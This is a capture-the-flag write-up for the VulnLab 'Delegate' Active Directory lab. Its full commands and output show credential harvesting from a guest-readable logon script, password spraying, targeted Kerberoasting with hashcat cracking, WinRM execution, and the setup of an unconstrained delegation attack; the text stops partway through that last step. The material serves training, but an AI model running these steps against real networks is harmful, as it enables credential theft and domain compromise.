POSTS

VULNLAB: Delegate

Delegate is a medium-rated Windows machine that involves Active Directory attacks. The machine has the guest account enabled, allowing the attacker to read files that contain hard-coded credentials. The credentials allow us to WriteProperty of a user account that is allowed to have WinRM sessions on the Domain Controller. The compromised user has the SeEnableDelegationPrivilege privilege assigned, which allows us to modify the TRUSTED_FOR_DELEGATION flag for AD objects, enabling us to perform Unconstrained Delegation.

VULNLAB: Delegate
3702 words · 18 min

Overview

  • Type Machines
  • OS Windows
  • Severity Medium
  • Creator Geiseric
  • Release date 2023 Oct 6

Enumeration

Start the instance via Discord, wait around 2 minutes for the machine to start all services and let’s go:

image

10.10.120.223

Nmap

$ nmap -sC -sV -Pn -p- --min-rate=1000 -T4 10.10.120.223 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-26 17:44 JST
Nmap scan report for 10.10.120.223
Host is up (0.24s latency).
Not shown: 65521 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-26 08:46:36Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-01-26T08:48:07+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: DELEGATE
|   NetBIOS_Domain_Name: DELEGATE
|   NetBIOS_Computer_Name: DC1
|   DNS_Domain_Name: delegate.vl
|   DNS_Computer_Name: DC1.delegate.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-01-26T08:47:28+00:00
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Not valid before: 2025-01-25T08:42:49
|_Not valid after:  2025-07-27T08:42:49
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
61214/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
  • Found a Domain Controller in the domain delegate.vl.
  • Main open ports are for DNS, LDAP, SMB, Kerberos and also RDP.
  • Add DC1.delegate.vl, delegate.vl in in /etc/hosts

SMB Shared folder (445/tcp) (A.Briggs)

List shared folders using the guest account:

$ nxc smb DC1.delegate.vl -u 'guest' -p '' --shares
SMB         10.10.120.223   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB         10.10.120.223   445    DC1              [+] delegate.vl\guest: 
SMB         10.10.120.223   445    DC1              [*] Enumerated shares
SMB         10.10.120.223   445    DC1              Share           Permissions     Remark
SMB         10.10.120.223   445    DC1              -----           -----------     ------
SMB         10.10.120.223   445    DC1              ADMIN$                          Remote Admin
SMB         10.10.120.223   445    DC1              C$                              Default share
SMB         10.10.120.223   445    DC1              IPC$            READ            Remote IPC
SMB         10.10.120.223   445    DC1              NETLOGON        READ            Logon server share 
SMB         10.10.120.223   445    DC1              SYSVOL          READ            Logon server share 

Found:

  • NETLOGON and SYSVOL with read only access
  • The server is Windows Server 2022 so pretty new with a build 20348

Quick overview and grab some files:

$ smbclientng -u 'guest' -p '' --host DC1.delegate.vl
               _          _ _            _                    
 ___ _ __ ___ | |__   ___| (_) ___ _ __ | |_      _ __   __ _ 
/ __| '_ ` _ \| '_ \ / __| | |/ _ \ '_ \| __|____| '_ \ / _` |
\__ \ | | | | | |_) | (__| | |  __/ | | | ||_____| | | | (_| |
|___/_| |_| |_|_.__/ \___|_|_|\___|_| |_|\__|    |_| |_|\__, |
    by @podalirius_                             v2.1.7  |___/  
    
[+] Successfully authenticated to 'DC1.delegate.vl' as '.\guest'!
■[\\DC1.delegate.vl\]> use netlogon
■[\\DC1.delegate.vl\NETLOGON\]> acls
d-------     0.00 B  2023-08-26 21:45  .\
d-------     0.00 B  2023-08-26 18:45  ..\
-a------   159.00 B  2023-08-26 21:54  users.bat
             Owner:   BUILTIN\Administrators
             Group:   DELEGATE\Domain Users
             Allowed: NT AUTHORITY\Authenticated Users READ_CONTROL | SYNCHRONIZE
             Allowed: Everyone                         READ_CONTROL | SYNCHRONIZE
             Allowed: BUILTIN\Server Operators         READ_CONTROL | SYNCHRONIZE

■[\\DC1.delegate.vl\NETLOGON\]> cat users.bat 
rem @echo off
net use * /delete /y
net use v: \\dc1\development 

if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
■[\\DC1.delegate.vl\NETLOGON\]> get users.bat 
'users.bat' ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 159/159 bytes • ? • 0:00:00
■[\\DC1.delegate.vl\NETLOGON\]> use SYSVOL
■[\\DC1.delegate.vl\SYSVOL\]> tree
└── delegate.vl/
    ├── DfsrPrivate/
[error] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.. Base path: .\delegate.vl\DfsrPrivate
    ├── Policies/
    │   ├── {31B2F340-016D-11D2-945F-00C04FB984F9}/
    │   │   ├── MACHINE/
    │   │   │   ├── Microsoft/
    │   │   │   │   └── Windows NT/
    │   │   │   │       └── SecEdit/
    │   │   │   │           └── GptTmpl.inf
    │   │   │   ├── Scripts/
    │   │   │   │   ├── Shutdown/
    │   │   │   │   └── Startup/
    │   │   │   └── Registry.pol
    │   │   ├── USER/
    │   │   └── GPT.INI
    │   └── {6AC1786C-016F-11D2-945F-00C04fB984F9}/
    │       ├── MACHINE/
    │       │   └── Microsoft/
    │       │       └── Windows NT/
    │       │           └── SecEdit/
    │       │               └── GptTmpl.inf
    │       ├── USER/
    │       └── GPT.INI
    └── scripts/
        └── users.bat
■[\\DC1.delegate.vl\SYSVOL\]> get 'delegate.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol' 
'Registry.pol' ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 2.8/2.8 kB • ? • 0:00:00
■[\\DC1.delegate.vl\SYSVOL\]> exit

Found an interesting users.bat file in NETLOGON and in the startup script folder in SYSVOL as well

Seems we have a user that is accessing a share in their startup script and accessing the backup share in the fileserver as an Administrator.

Let’s check if the user A.Briggs uses the password P4ssw0rd1#123:

$ nxc smb DC1.delegate.vl -u 'A.Briggs' -p 'P4ssw0rd1#123'         
SMB         10.10.120.223   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB         10.10.120.223   445    DC1              [+] delegate.vl\A.Briggs:P4ssw0rd1#123 

Confirmed A.Briggs:P4ssw0rd1#123

Check if he has more SMB shares:

$ nxc smb DC1.delegate.vl -u 'A.Briggs' -p 'P4ssw0rd1#123' --shares
SMB         10.10.120.223   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB         10.10.120.223   445    DC1              [+] delegate.vl\A.Briggs:P4ssw0rd1#123 
SMB         10.10.120.223   445    DC1              [*] Enumerated shares
SMB         10.10.120.223   445    DC1              Share           Permissions     Remark
SMB         10.10.120.223   445    DC1              -----           -----------     ------
SMB         10.10.120.223   445    DC1              ADMIN$                          Remote Admin
SMB         10.10.120.223   445    DC1              C$                              Default share
SMB         10.10.120.223   445    DC1              IPC$            READ            Remote IPC
SMB         10.10.120.223   445    DC1              NETLOGON        READ            Logon server share 
SMB         10.10.120.223   445    DC1              SYSVOL          READ            Logon server share 

Nothing is new

RID Brute-forcing

As we are able to read IPC$ so we can proceed to RID brute-force attack to enumerate all domain users:

$ nxc smb DC1.delegate.vl -u 'A.Briggs' -p 'P4ssw0rd1#123' --rid-brute 10000
SMB         10.10.120.223   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB         10.10.120.223   445    DC1              [+] delegate.vl\A.Briggs:P4ssw0rd1#123 
SMB         10.10.120.223   445    DC1              498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.120.223   445    DC1              500: DELEGATE\Administrator (SidTypeUser)
SMB         10.10.120.223   445    DC1              501: DELEGATE\Guest (SidTypeUser)
SMB         10.10.120.223   445    DC1              502: DELEGATE\krbtgt (SidTypeUser)
SMB         10.10.120.223   445    DC1              512: DELEGATE\Domain Admins (SidTypeGroup)
SMB         10.10.120.223   445    DC1              513: DELEGATE\Domain Users (SidTypeGroup)
SMB         10.10.120.223   445    DC1              514: DELEGATE\Domain Guests (SidTypeGroup)
SMB         10.10.120.223   445    DC1              515: DELEGATE\Domain Computers (SidTypeGroup)
SMB         10.10.120.223   445    DC1              516: DELEGATE\Domain Controllers (SidTypeGroup)
SMB         10.10.120.223   445    DC1              517: DELEGATE\Cert Publishers (SidTypeAlias)
SMB         10.10.120.223   445    DC1              518: DELEGATE\Schema Admins (SidTypeGroup)
SMB         10.10.120.223   445    DC1              519: DELEGATE\Enterprise Admins (SidTypeGroup)
SMB         10.10.120.223   445    DC1              520: DELEGATE\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.120.223   445    DC1              521: DELEGATE\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.120.223   445    DC1              522: DELEGATE\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.120.223   445    DC1              525: DELEGATE\Protected Users (SidTypeGroup)
SMB         10.10.120.223   445    DC1              526: DELEGATE\Key Admins (SidTypeGroup)
SMB         10.10.120.223   445    DC1              527: DELEGATE\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.120.223   445    DC1              553: DELEGATE\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.120.223   445    DC1              571: DELEGATE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.120.223   445    DC1              572: DELEGATE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.120.223   445    DC1              1000: DELEGATE\DC1$ (SidTypeUser)
SMB         10.10.120.223   445    DC1              1101: DELEGATE\DnsAdmins (SidTypeAlias)
SMB         10.10.120.223   445    DC1              1102: DELEGATE\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.120.223   445    DC1              1104: DELEGATE\A.Briggs (SidTypeUser)
SMB         10.10.120.223   445    DC1              1105: DELEGATE\b.Brown (SidTypeUser)
SMB         10.10.120.223   445    DC1              1106: DELEGATE\R.Cooper (SidTypeUser)
SMB         10.10.120.223   445    DC1              1107: DELEGATE\J.Roberts (SidTypeUser)
SMB         10.10.120.223   445    DC1              1108: DELEGATE\N.Thompson (SidTypeUser)
SMB         10.10.120.223   445    DC1              1121: DELEGATE\delegation admins (SidTypeGroup)

Let’s copy/paste the output to a file then get just the users and put them in a new wordlist file:

$ cat all_sids.txt | grep TypeUser | awk '{ print $6}' | cut -d '\' -f 2 > all_users.txt 
$ cat all_users.txt                                                                     
Administrator
Guest
krbtgt
DC1$
A.Briggs
b.Brown
R.Cooper
J.Roberts
N.Thompson

Password Spray attacking

Let’s go for checking if any user uses the same password than A.Briggs:

$ nxc smb DC1.delegate.vl -u all_users.txt -p 'P4ssw0rd1#123' --continue-on-success
SMB         10.10.120.223   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB         10.10.120.223   445    DC1              [-] delegate.vl\Administrator:P4ssw0rd1#123 STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\Guest:P4ssw0rd1#123 STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\krbtgt:P4ssw0rd1#123 STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\DC1$:P4ssw0rd1#123 STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [+] delegate.vl\A.Briggs:P4ssw0rd1#123 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\b.Brown:P4ssw0rd1#123 STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\R.Cooper:P4ssw0rd1#123 STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\J.Roberts:P4ssw0rd1#123 STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\N.Thompson:P4ssw0rd1#123 STATUS_LOGON_FAILURE 

No one

Let’s try again to check if any user has the same password as username:

$ nxc smb DC1.delegate.vl -u all_users.txt -p all_users.txt --continue-on-success 
SMB         10.10.120.223   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB         10.10.120.223   445    DC1              [-] delegate.vl\Administrator:Administrator STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\Guest:Administrator STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\krbtgt:Administrator STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\DC1$:Administrator STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\A.Briggs:Administrator STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\b.Brown:Administrator STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\R.Cooper:Administrator STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\J.Roberts:Administrator STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\N.Thompson:Administrator STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\Administrator:Guest STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\Guest:Guest STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\krbtgt:Guest STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\DC1$:Guest STATUS_LOGON_FAILURE 
SMB         10.10.120.223   445    DC1              [-] delegate.vl\A.Briggs:Guest STATUS_LOGON_FAILURE 
...

No one

BloodHound

Let’s go to enumerate the Active Directory then ingest to BloodHound Community Edition for analysis:

$ nxc ldap DC1.delegate.vl -d delegate.vl -u 'A.Briggs' -p 'P4ssw0rd1#123' --bloodhound --dns-server 10.10.120.223 --dns-tcp --dns-timeout 10 --collection All,LoggedOn
SMB         10.10.120.223   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
LDAP        10.10.120.223   389    DC1              [+] delegate.vl\A.Briggs:P4ssw0rd1#123 
LDAP        10.10.120.223   389    DC1              Resolved collection methods: psremote, rdp, acl, container, objectprops, trusts, session, group, dcom, loggedon, localadmin
LDAP        10.10.120.223   389    DC1              Done in 00M 51S
LDAP        10.10.120.223   389    DC1              Compressing output into /home/user/.nxc/logs/DC1_10.10.120.223_2025-01-26_181656_bloodhound.zip

Let’s check A.Briggs:

image

image

A.Briggs is a simple domain user but with an intersting outbound object control: GenericWrite privilege over N.Thompson

image

N.Thompson is a member of REMOTE MANAGEMENT USERS and DELEGATION ADMINS groups.

  • So he can:
    • access to the DC via WMI protocol
    • allow delegation in the DC.

So we can have the attack path below:

image

Targeted Kerberoast attacking (N.Thompson) (Delegate_User)

With the GenericWrite privilege over N.Thompson, A.Briggs can perform a targeted kerberoast attack to request a ticket (TGS) on behalf of this user:

$ git clone https://github.com/ShutdownRepo/targetedKerberoast.git
$ python3 targetedKerberoast/targetedKerberoast.py -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user 'N.Thompson' 
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$ff8b349c9420d25d27760f6ccbdc44ec$cd3baef121fd1a6731a0e64b42c31941f3bf38165891a5dcab5d7e455a071b8cdd9cc9c17e53f99c732881f07334327c0a8607f86854cea0cbfa49c6b5eedd894f708be482b9ddfe7717d56841e7f3aa8fd39ad53f204c170c3b7e597eeb74c8b3695c1a1425612752f42e41b4076d8c18378c03b24d1b93021dd81281130a885bf934697fc9b803c51f0c634c50b7cddca2e965a0199f29775b1f91e73314615ad65c02d9756e80510b476ce83cbc057d2fd29b0f8b570867aaa4f3c6cc30fdeb83526e0552c7cfd6dde8e712b06d8c05882c92d0acf95780c4024dd6fe9d97424a633fe0809ef9ac6da3f61b91c5ebf5923d17438b7c3b8c8c1fa08d8401edd3fbad5573b70e8db5510920217b2bd951458c6a8b4abab0073cc5eae45cc7dda52971fab6a6a51a7cc862330db6a0dbaea92dff1909c3ec766383f1d55cd8fa78c98087b78154228e4d7161af1883193ecdf30c470daca80d2a9f3b96dd0806cd09a0d9e0f853abeafaca7c349e4331255fcb7acd8fbb116bfff940823b0122507cd12b8f06e84d13a336b2d1f6bc577a1f48077d7d02017a5d8d78144e471131267e2b9ecbd945d32a7a4800243cbf88662ae79c5b9a31a837055f94b2c6c3372aae10c42d6e7b33b2d95cbf04574a8cae851975db5461426d3bf23128c5338d36fbce2d7e93c5a3ff931ea0c5ab431e3cae09ea390f45dacb6bb1b7d2bb3e7a678ed792f8ec347bfdee9f5e8dd4e96eb74d5cf8a06aa7e979706942d8d15510852b989b7113c27c1ac1ff1698f5a9e16e27ac60aaca579d870051ff6b861b1cfc66e2ce2b6142b5c37660d039d71ea8bb0404f9bca4e0a61c2b166dffce2c42c615c3684585329eaf5d28744dc17ae6a5c11f0b88a6e5240b4230e372e7b45b4d4f0acceee1da56fdbe396e3d2e896c2b7679163e921e7aa4e381598d40db4146e8c79bac9dd73fd30df095497ba54cba7ad2aa631d8cbe7255ca26f1a849c9dc2b798894ad0352a44b3611b2d3dec874d2ec0ec184007437fe0dc5956697e6829680424d82e0b4d25a223e108dd826026583d88636b0c085fe0e8091209e49fd91fc75a078a3eb7e3a5c37d19c6e3a01d6e704da3dda21f72d4909497ca4c956440c72f9a7fa2b8d311ac5ed7e8da5f10261f8f849b45779776fa6cb20cd9108cb36519e596ab32fc48ff0817283fcffeb64cbb36e976ff6de4ac8ac1f04131c883adb84b455e9818d9fb46e0aa3d3cabc14493ea296fe81222f953b50e51761d1580668c0a15279db7d83871bd24d72dd8f1c8e11e5e1d402a3c5086c88260526a11b90c09cf2f34e742fde9265f525a12605370f42a88fd9e308ab92d81a95de47ed2887067ece22bc04eb46c0a05fb5ff69f70c420152c9cacc9de3381e3da3ce1b51cb2041cde34841c9d58e13d87fff9f654f0ec03e11aebf2ab2c1a5820c0f

Then try to crack it with Hashcat:

$ cat N.Thompson.hash 
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$ff8b349c9420d25d27760f6ccbdc44ec$cd3baef121fd1a6731a0e64b42c31941f3bf38165891a5dcab5d7e455a071b8cdd9cc9c17e53f99c732881f07334327c0a8607f86854cea0cbfa49c6b5eedd894f708be482b9ddfe7717d56841e7f3aa8fd39ad53f204c170c3b7e597eeb74c8b3695c1a1425612752f42e41b4076d8c18378c03b24d1b93021dd81281130a885bf934697fc9b803c51f0c634c50b7cddca2e965a0199f29775b1f91e73314615ad65c02d9756e80510b476ce83cbc057d2fd29b0f8b570867aaa4f3c6cc30fdeb83526e0552c7cfd6dde8e712b06d8c05882c92d0acf95780c4024dd6fe9d97424a633fe0809ef9ac6da3f61b91c5ebf5923d17438b7c3b8c8c1fa08d8401edd3fbad5573b70e8db5510920217b2bd951458c6a8b4abab0073cc5eae45cc7dda52971fab6a6a51a7cc862330db6a0dbaea92dff1909c3ec766383f1d55cd8fa78c98087b78154228e4d7161af1883193ecdf30c470daca80d2a9f3b96dd0806cd09a0d9e0f853abeafaca7c349e4331255fcb7acd8fbb116bfff940823b0122507cd12b8f06e84d13a336b2d1f6bc577a1f48077d7d02017a5d8d78144e471131267e2b9ecbd945d32a7a4800243cbf88662ae79c5b9a31a837055f94b2c6c3372aae10c42d6e7b33b2d95cbf04574a8cae851975db5461426d3bf23128c5338d36fbce2d7e93c5a3ff931ea0c5ab431e3cae09ea390f45dacb6bb1b7d2bb3e7a678ed792f8ec347bfdee9f5e8dd4e96eb74d5cf8a06aa7e979706942d8d15510852b989b7113c27c1ac1ff1698f5a9e16e27ac60aaca579d870051ff6b861b1cfc66e2ce2b6142b5c37660d039d71ea8bb0404f9bca4e0a61c2b166dffce2c42c615c3684585329eaf5d28744dc17ae6a5c11f0b88a6e5240b4230e372e7b45b4d4f0acceee1da56fdbe396e3d2e896c2b7679163e921e7aa4e381598d40db4146e8c79bac9dd73fd30df095497ba54cba7ad2aa631d8cbe7255ca26f1a849c9dc2b798894ad0352a44b3611b2d3dec874d2ec0ec184007437fe0dc5956697e6829680424d82e0b4d25a223e108dd826026583d88636b0c085fe0e8091209e49fd91fc75a078a3eb7e3a5c37d19c6e3a01d6e704da3dda21f72d4909497ca4c956440c72f9a7fa2b8d311ac5ed7e8da5f10261f8f849b45779776fa6cb20cd9108cb36519e596ab32fc48ff0817283fcffeb64cbb36e976ff6de4ac8ac1f04131c883adb84b455e9818d9fb46e0aa3d3cabc14493ea296fe81222f953b50e51761d1580668c0a15279db7d83871bd24d72dd8f1c8e11e5e1d402a3c5086c88260526a11b90c09cf2f34e742fde9265f525a12605370f42a88fd9e308ab92d81a95de47ed2887067ece22bc04eb46c0a05fb5ff69f70c420152c9cacc9de3381e3da3ce1b51cb2041cde34841c9d58e13d87fff9f654f0ec03e11aebf2ab2c1a5820c0f

$ hashcat -a 0 -m 13100 N.Thompson.hash /usr/share/wordlists/rockyou.txt  
hashcat (v6.2.6) starting
...
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$ff8b349c9420d25d27760f6ccbdc44ec$cd3baef121fd1a6731a0e64b42c31941f3bf38165891a5dcab5d7e455a071b8cdd9cc9c17e53f99c732881f07334327c0a8607f86854cea0cbfa49c6b5eedd894f708be482b9ddfe7717d56841e7f3aa8fd39ad53f204c170c3b7e597eeb74c8b3695c1a1425612752f42e41b4076d8c18378c03b24d1b93021dd81281130a885bf934697fc9b803c51f0c634c50b7cddca2e965a0199f29775b1f91e73314615ad65c02d9756e80510b476ce83cbc057d2fd29b0f8b570867aaa4f3c6cc30fdeb83526e0552c7cfd6dde8e712b06d8c05882c92d0acf95780c4024dd6fe9d97424a633fe0809ef9ac6da3f61b91c5ebf5923d17438b7c3b8c8c1fa08d8401edd3fbad5573b70e8db5510920217b2bd951458c6a8b4abab0073cc5eae45cc7dda52971fab6a6a51a7cc862330db6a0dbaea92dff1909c3ec766383f1d55cd8fa78c98087b78154228e4d7161af1883193ecdf30c470daca80d2a9f3b96dd0806cd09a0d9e0f853abeafaca7c349e4331255fcb7acd8fbb116bfff940823b0122507cd12b8f06e84d13a336b2d1f6bc577a1f48077d7d02017a5d8d78144e471131267e2b9ecbd945d32a7a4800243cbf88662ae79c5b9a31a837055f94b2c6c3372aae10c42d6e7b33b2d95cbf04574a8cae851975db5461426d3bf23128c5338d36fbce2d7e93c5a3ff931ea0c5ab431e3cae09ea390f45dacb6bb1b7d2bb3e7a678ed792f8ec347bfdee9f5e8dd4e96eb74d5cf8a06aa7e979706942d8d15510852b989b7113c27c1ac1ff1698f5a9e16e27ac60aaca579d870051ff6b861b1cfc66e2ce2b6142b5c37660d039d71ea8bb0404f9bca4e0a61c2b166dffce2c42c615c3684585329eaf5d28744dc17ae6a5c11f0b88a6e5240b4230e372e7b45b4d4f0acceee1da56fdbe396e3d2e896c2b7679163e921e7aa4e381598d40db4146e8c79bac9dd73fd30df095497ba54cba7ad2aa631d8cbe7255ca26f1a849c9dc2b798894ad0352a44b3611b2d3dec874d2ec0ec184007437fe0dc5956697e6829680424d82e0b4d25a223e108dd826026583d88636b0c085fe0e8091209e49fd91fc75a078a3eb7e3a5c37d19c6e3a01d6e704da3dda21f72d4909497ca4c956440c72f9a7fa2b8d311ac5ed7e8da5f10261f8f849b45779776fa6cb20cd9108cb36519e596ab32fc48ff0817283fcffeb64cbb36e976ff6de4ac8ac1f04131c883adb84b455e9818d9fb46e0aa3d3cabc14493ea296fe81222f953b50e51761d1580668c0a15279db7d83871bd24d72dd8f1c8e11e5e1d402a3c5086c88260526a11b90c09cf2f34e742fde9265f525a12605370f42a88fd9e308ab92d81a95de47ed2887067ece22bc04eb46c0a05fb5ff69f70c420152c9cacc9de3381e3da3ce1b51cb2041cde34841c9d58e13d87fff9f654f0ec03e11aebf2ab2c1a5820c0f:KALEB_2341
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.T...820c0f
...

Found N.Thompson:KALEB_2341

As N.Thompson can access to the DC via WinRM, we can grab the Delegate_User flag:

$ nxc winrm DC1.delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -X 'type c:\users\n.thompson\desktop\user.txt'
WINRM       10.10.120.223   5985   DC1              [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl)
WINRM       10.10.120.223   5985   DC1              [+] delegate.vl\N.Thompson:KALEB_2341 (Pwn3d!)
WINRM       10.10.120.223   5985   DC1              [+] Executed command (shell type: powershell)
WINRM       10.10.120.223   5985   DC1              VL{29f9de899146d9a73574b873855eefef}

Privilege Escalation

Check the privilege of N.Thompson:

$ nxc winrm DC1.delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -X 'whoami /priv'                             
WINRM       10.10.120.223   5985   DC1              [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl)
WINRM       10.10.120.223   5985   DC1              [+] delegate.vl\N.Thompson:KALEB_2341 (Pwn3d!)
WINRM       10.10.120.223   5985   DC1              [+] Executed command (shell type: powershell)
WINRM       10.10.120.223   5985   DC1              
WINRM       10.10.120.223   5985   DC1              PRIVILEGES INFORMATION
WINRM       10.10.120.223   5985   DC1              ----------------------
WINRM       10.10.120.223   5985   DC1              
WINRM       10.10.120.223   5985   DC1              Privilege Name                Description                                                    State
WINRM       10.10.120.223   5985   DC1              ============================= ============================================================== =======
WINRM       10.10.120.223   5985   DC1              SeMachineAccountPrivilege     Add workstations to domain                                     Enabled
WINRM       10.10.120.223   5985   DC1              SeChangeNotifyPrivilege       Bypass traverse checking                                       Enabled
WINRM       10.10.120.223   5985   DC1              SeEnableDelegationPrivilege   Enable computer and user accounts to be trusted for delegation Enabled
WINRM       10.10.120.223   5985   DC1              SeIncreaseWorkingSetPrivilege Increase a process working set                                 Enabled

SeEnableDelegationPrivilege seems interesting, this specific privilege allows us to enable the trusted asset for computer and user accounts.

From this elastic’s article, The assignment of the SeEnableDelegationPrivilege sensitive “user right” to a user. The SeEnableDelegationPrivilege “user right” enables computer and user accounts to be trusted for delegation. Attackers can abuse this right to compromise Active Directory accounts and elevate their privileges.

SeEnableDelegationPrivilege & MAQ checking

Our goal is to create a computer account and use it for a Kerberos Unconstrained Delegation attack when leveraging owned account N.Thompson with sufficient permissions SeEnableDelegationPrivilege.

KUD mindmap DDYXGSWu

Credit image to The Hacker Recipes.

Check the value of the MachineAccountQuota attribute:

$ nxc ldap DC1.delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -M maq           
SMB         10.10.120.223   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
LDAP        10.10.120.223   389    DC1              [+] delegate.vl\N.Thompson:KALEB_2341 
MAQ         10.10.120.223   389    DC1              [*] Getting the MachineAccountQuota
MAQ         10.10.120.223   389    DC1              MachineAccountQuota: 10

Perfect, we can create 10 computer objects.

Or using BloodyAD:

$ bloodyAD -d delegate.vl -u 'N.Thompson' -p 'KALEB_2341' --host DC1.delegate.vl get object 'DC=delegate,DC=vl' --attr ms-DS-MachineAccountQuota

distinguishedName: DC=delegate,DC=vl
ms-DS-MachineAccountQuota: 10

We have all pre-requirements to proceed to a Kerberos Unconstrained Delegation attack.

Kerberos Unconstrained Delegation attacking (DC1$) (Delegate_Root)

Our list of the required SPNs is below:

HTTP/obake.delegate.vl
RestrictedKrbHost/obake
HOST/obake
RestrictedKrbHost/obake.delegate.vl
HOST/obake.delegate.vl

Way 1 - Full remotely from our attacker machine

  1. Create a new machine account:
$ bloodyAD -d delegate.vl -u 'N.Thompson' -p 'KALEB_2341' --host DC1.delegate.vl add computer 'obake' 'Azerty123!' 
[+] obake created
  1. Enable unconstrained delegation (aka TRUSTED_FOR_DELEGATION UAC) for this machine account (we can do it because we have the SeEnableDelegationPrivilege token):
$ bloodyAD -d delegate.vl -u 'N.Thompson' -p 'KALEB_2341' --host DC1.delegate.vl add uac 'obake$' -f TRUSTED_FOR_DELEGATION
